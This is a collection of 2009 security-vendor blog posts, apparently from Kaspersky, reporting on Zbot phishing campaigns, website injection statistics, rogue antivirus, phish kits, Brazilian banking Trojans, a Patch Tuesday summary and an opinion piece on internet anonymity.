Halloween's almost here. And it's not just the witches, ghosts and ghouls you need to watch out for, but the latest wave of Internet scams. As ever, the spammers are out in force, offering cheap software:

costumes and personalized gifts:

and even e-cards!

Last month on our Russian blog we talked about how the Zbot Trojan was being spread via spam messages which looked as though they came from the US Federal Tax authorities.

One reader commented jokingly that we should keep tabs on tax deadlines in other countries in order to detect future mass mailings of Zbot.

And then we got an email from HM Revenue and Customs, the body responsible for taxes in the UK:

Of course the link led to a phishing site which looked very like the real HMRC site:

And of course, the exe file which pretends to be a tax statement is Zbot – looks as though this Trojan likes playing taxman!

Around October 20th we received mails from our office in Turkey about the "possible spread of a new virus". And our colleagues were right, something was going on. Some days before that, on Oct 16th we noticed changes on some websites which we monitored since May 2009 when 'gumblar' was spreading. While the attack in April/May just worked with iframes redirecting to two malicious sites (gumblar.cn, martuz.cn), this time the spreading servers are more widely distributed - we identified more than 202 locations.

The following is a TOP 20 list of countries with 'injected' hosts who point to these malicious URLs:

7271    UNITED STATES*
704      RUSSIAN FEDERATION
675      REPUBLIC OF KOREA
619      ISLAMIC REPUBLIC OF IRAN
540      TURKEY
510      GERMANY
499      INDIA
487      JAPAN
400      THAILAND
382      POLAND
379      BRAZIL
345      ARGENTINA
298      CZECH REPUBLIC
187      HUNGARY
182      BELGIUM
173      ITALY
163      ROMANIA
159      UKRAINE
157      FRANCE
117      VIET NAM

*Note: The US count contains more than 4000 entries pointing to a Persian Blog Site, which probably was the biggest abused entry so far.

We often write about the fact that cybercriminals constantly change their tactics to take account of developments in the security and software industries. And I just came across a great example of this: it shows how the people behind rogue antivirus solutions adapt their "products" to exploit developments and changes in genuine AV solutions.

A couple of months ago, Microsoft released its free anti-malware product, Microsoft Security Essentials. It's designed to ultimately replace Windows Defender, an earlier in-built antispyware product. It looks as though the guys behind the rogue AV which I just came across aren't only playing on people's fears, but on their lack of knowledge. Malware and IT threats are getting increasing coverage in the general media, but if you're not particularly interested in IT, you're not that likely to remember all the facts. Using the name "Windows Enterprise Defender" is a neat way of getting someone who might have heard of Windows Defender, and half-remembers Microsoft's latest release, to be fooled into thinking that the rogue AV is the genuine article.

Of course, the product activation process looks very similar to the genuine Microsoft process...

Malware writers today always try to conceal their identities, right? Wrong – even some of today’s profit driven cyber criminals reveal their identities. We are a bit surprised, but here is the story of how a blackhat has revealed his identity and is trying to ‘get compensation’ from Kaspersky for conducting research.

Recently we have been looking into a new service for malware writers: [avtracker dot info]. This is an online service designed to track AV vendors. The home page of [avtracker dot info] describes the service which includes protection for malicious programs against analysis by malware researchers and also calls for a DDoS attacks against security companies:

Moreover, some of our fellow researchers shared a network request with us that was used to report back to [avtracker dot info]. This request was used in a special spy program which was distributed to various antivirus labs by the owner of [avtracker dot info]. If executed, this spyware would contact the owner and describe the environment of the infected machine. We played around with this request, and substituted various random strings instead of the user name and system parameters.

The WHOIS listing was of no use – [avtracker dot info] was registered anonymously. This was no surprise – cyber criminals usually do register domains anonymously to hinder identification.

So far, nothing out of the ordinary – a normal day in the life of an antivirus company. And then…surprise – the owner of the malware writers’ service contacted us and revealed his identity. Moreover, he even demanded a ransom of 2000 euro to compensate his purported losses when we attempt to ‘break’ his new toy.

At the time of writing, we have received the spy program, which had the following message in its code pointing to the same person who contacted us:

Naturally, we have gathered all relevant data and forwarded it to our lawyer who will now take the next steps. If all cyber criminals were as cooperative as this one, life would be much easier for AV companies.

There seems to be quite a loud response to what I thought was a rather simple idea. In this post, I am going to go over the main points – somewhere when I have more time I’ll share my ideas in detail so people could see exactly what I am proposing.

1. Common users are NOT anonymous for police and governments. Today the authorities can find any person they are after easily. There is a wrong perception about Internet-anonymity – very few people realize that it does not exist for ordinary users. But the worst part of the story is that the ones who are truly anonymous are professional cyber criminals, because they know what to do to hide their real identities in the Internet. That is why we have millions of malicious programs and successful network attacks every years, and we don’t know who’s behind of them.
2. When I say "no anonymity" I mean only "no anonymity for security control". I don't care about the way people behave on blogs, forums, social networks and pirate torrent portals. You may use nicks or real names as you want (as we do today). The only "no more anonymity" improvement - you MUST present your ID to your Internet provider when you are connecting online. It is only the provider who needs to know your real identity.
3. Another way to go is dedicated anonymous networks and dedicated business/gov networks - why not? But all LEGAL businesses/services will want to use secure networks, and unsecure networks will be probably limited to casual communication.
4. When is it going to happen? Never… or in one-two generations. After some really serious IT- incidents, which will have a serious impact on national and\or global economies. I am now talking not only about cybercrime, but also about cyberterrorist attacks. We already see the first signs of emerging cyberterrorism – and global anonymity is a really favorable factor for these people.

   Imagine that everyone flying in your plane is anonymous, so you don’t know who they are and what they’re up to – are you really going to approve of this? And Internet is as critical and as vulnerable as the air transportation network. So why do we have different security standards for these two global networks?

5. But we are already on the way – some European countries have introduced digital IDs, which they use for secure online banking and in some cases for online voting. National and municipal elections via the Internet are not a matter of science fiction – they are already here, and ID authentication is a vital part of such election systems.

   Another prototype of e-passports is the two-factor authentication we now use to access corporate networks. The only thing that is missing today is a common standard.

Anyway, I am happy to see that my ideas have raised so much discussion; I think that open public discourse and idea-sharing is the only way to make Internet a safer and a better place.

Here are some technical details to expand on the previous post from Darya.

1. The Spam

According to our preliminary research, the spam emails which attacked OWA users, including Kaspersky, were sent using the pushdo botnet – which is based on malware from the Backdoor.Win32.NewRes family. These Trojans spread via spam, social networks (in conjunction with the Koobface family) and through hacked websites.

The spam emails link to a phishing webpage which is registered to 15 dynamic IP addresses located in separate IP sectors and which are constantly changing.

2. The Phish

An analysis of the phishing site proves that the criminals are using rock phishing techniques – typical rock phish structure and together with dynamic content which morphs to target users from the domain under attack.

3. The Trojan

This OWA phishing attack is spreading a variant of Trojan-Spy.Win32.Zbot – a Trojan which steals passwords fstored on the infected machines; specifically passwords to local applications, passwords to websites etc. The Trojan also has keyboard logger functionality. Finally, this Zbot can also download other malware if required. In this instance, the command and control center is located in the Ukraine.

Summary

This particular attack is using well-known methods overall. The notable features of the attack are the domain name spoofing and the creation of a phishing site which mimics OWA pages. The rest is as usual.

Yesterday we saw a phishing attack targeting users of Outlook Web Access (OWA) service – used worldwide to access email from Microsoft Exchange Servers via the Internet. Users received emails which told them that a security upgrade required them to apply new settings by clicking on the enclosed link.

This is a typical phishing text, but the criminal used domain spoofing to make the email seem as if it came from the recipient’s own domain. In reality, by clicking on the link victims landed on a phishing page which only looked like a standard OWA page.

Once on the phishing page, the user was asked to download an .exe file in order to update security settings. Instead of security updates, the victims were installing a Zbot Trojan (Trojan-Spy.Win32.Zbot family).

Interestingly enough, all of the phishing domains were in the .eu and .co.uk zones – which is actually a rare case, since most phisher domains are located in Third World countries.

OWA is a popular service in the business community today so the phishers are likely to reach significant numbers of people. Once again, we remind people to check emails carefully before clicking on links – and recommend network admins to warn their users about this attack.

Today marks the largest patch Tuesday ever from our friends in Redmond with 13 vulnerabilities addressed, covering a total of 34 potential exploits. Three of the exploits have had public code posted while 11 of them are rated as likely to be consistently exploitable.

The most alarming vulnerability this month is MS09-050, which according to its discoverer, was introduced by the patch for MS07-063. MS09-050 was first published publicly on security researcher Laurent Gaffié’s blog on September 7th outlining a denial of service vulnerability in SMB 2.0, specifically the srv2.sys driver. You might remember some of the buzz when this was first released as several people immediately added that that this was not only a denial of service, but could easily lead to remote code execution. What should be just as concerning for Microsoft, however, is the fact that the vulnerability affects Windows Vista and Windows 7 machines and not Windows XP - not an encouraging sign.

Included in this patch are also updated kill bits for ActiveX controls ala MS09-035, which if you remember was related to several vulnerabilities in ATL. Also, MS09-060 appears to address these vulnerabilities as they pertain to MS Office. It’s less than settling to see this vulnerability still has not been fully patched.
Another highly visible patch this month is the fix for the SSL certificate impersonation vulnerability, MS09-056. Those who attended Blackhat LV in July won’t have forgotten that this was the exploit being enthusiastically described to a standing room only audience by Moxie Marlinspike. Interestingly enough, this vulnerability was discovered by Dan Kaminsky.

As always, make sure to apply these patches as soon as possible and especially this month if you are using Windows Vista or later with SMB enabled!

During routine malware analysis we sometimes find new techniques which are being used by Brazilian cybercriminals to remove security protection. Now it's Brazilian banking Trojans are using Gmer, a well known standalone anti-rootkit tool to remove GBPlugin, a very popular security mechanism used by the four largest Brazilian banks. There are around 15 million Brazilian computers running GBPlugin which is designed to prevent the theft of personal banking data.

It’s common behavior for malware developers to use legitimate software to remove antivirus and other security solutions. We saw it with PSEXEC of Sysinternals. In Brazil this is the second time we know of that local malware has used a legitimate tool; the first was when Avenger, another anti-rootkit tool, was used to remove the same GBPlugin files.

The malware which we've just looked at downloads an old version of Gmer (1.014) from a legitimate, but compromised, Chinese server. Its saves it as System%\logsvc.exe and once it's installed, the malware registers a special service to remove GBPlugin using rootkit technology.

A bat file is created on the system and inside the file you can see the commands designed to kill all running files of GBPlugin, using the
–killfile parameter.

Another driver with commands to delete the GBPlugin files is installed to ensure that all the files will be removed:

This Trojan is already detected by our products as Trojan-Downloader.Win32.Homa.yw, and the driver is detected as Rootkit.Win32.Agent.neg.

Imagine you live in the former Soviet Union. Now imagine that you get a message saying 'How to overcome GAI corruption' [GAI – State Automobile Inspectorate, or, to put it more crudely, the traffic cops].

You're a driver, so you've likely been stopped by a cop or two in your time, and maybe made to cough up some money on a flimsy pretext. Yes, corruption's something you'd like to see stopped.

So you read on, and find out that you can send your suggestions to the head of the GAI by sending an SMS to a short number. The message even tells you that this service is supported by the Ukrainian Automobile State Inspectorate.

Is this scam starting to sound familiar? It's not just cops who are corrupt...

Today I got a 'Anti-virus notification message' from our mail server (protected by kav4lms) so naturally I was interested in what the content was. Examining the quarantined mail on the server revealed some interesting details starting from the mail header itself:

"X-PHP-Script: <removed>.com/templates/beez/woolf2.php for 41.248.<xx.xx>

The message had come from a compromised host and a php mailer was used
directly from there to send phishing mails.

A quick trip to the location mentioned in the header showed a mass mailer GUI containing a link to a spammer site which is currently offline. But a little digging around showed the site had been hosting 'phish kits' - collections of malicious files which can be downloaded 'for free'.

These 'phish kits' are archives which just need to be extracted to a compromised server. All a cybercriminal needs to do (apart from finding a compromised server) is edit one of the files in that package and input a mail address where harvested information should be sent to. The twist is - not only does the information get sent to the designated email address, but to another cybercriminal as well.

This scam is nothing new, but less experienced bad guys might not realize that they're sharing their ill-gotten gains with other, more technically savvy, blackhats.

Greetings from the “Steigenberger Kurhaus Hotel” in The Hague, or “Den Haag”, as the locals like to call it, where the 2009 ISSE Conference is currently taking place.

I’m here with my colleague Stefan (in the pic), who delivered his presentation on WEB 2.0 threats earlier today, on the second day of the conference.

Yesterday was the grand opening day, with a number of interesting speeches. Norbert Pohlmann, Chairman of the Board, TeleTrusT, had a very interesting talk about the way we'll work in the future. His data indicates that today we have about 70 CPUs per person, in netbooks, cars, mobiles etc…but we'll reach thousands of CPUs per person in the next 10 years.

Jim King, PDF Platform Architect, from Adobe Systems Incorporated, delivered a very interesting presentation on the advantages of using PDF and embedding digital signatures into them. With PDF being today's file format of choice for malware delivery, it may be that some organizations start moving away from PDF files. This is why it's very important that Adobe begins what Microsoft did in 2002 with the Trustworthy Computing Initiative.

Mike Reavey, Director of MRSC (Microsoft), delivered a very interesting speech explaining the MSRC process; he did say a few controversial things which generated heated debate afterwards – for instance, “There are hackers who actually work at Microsoft”.

All the best from the cloudy Netherlands!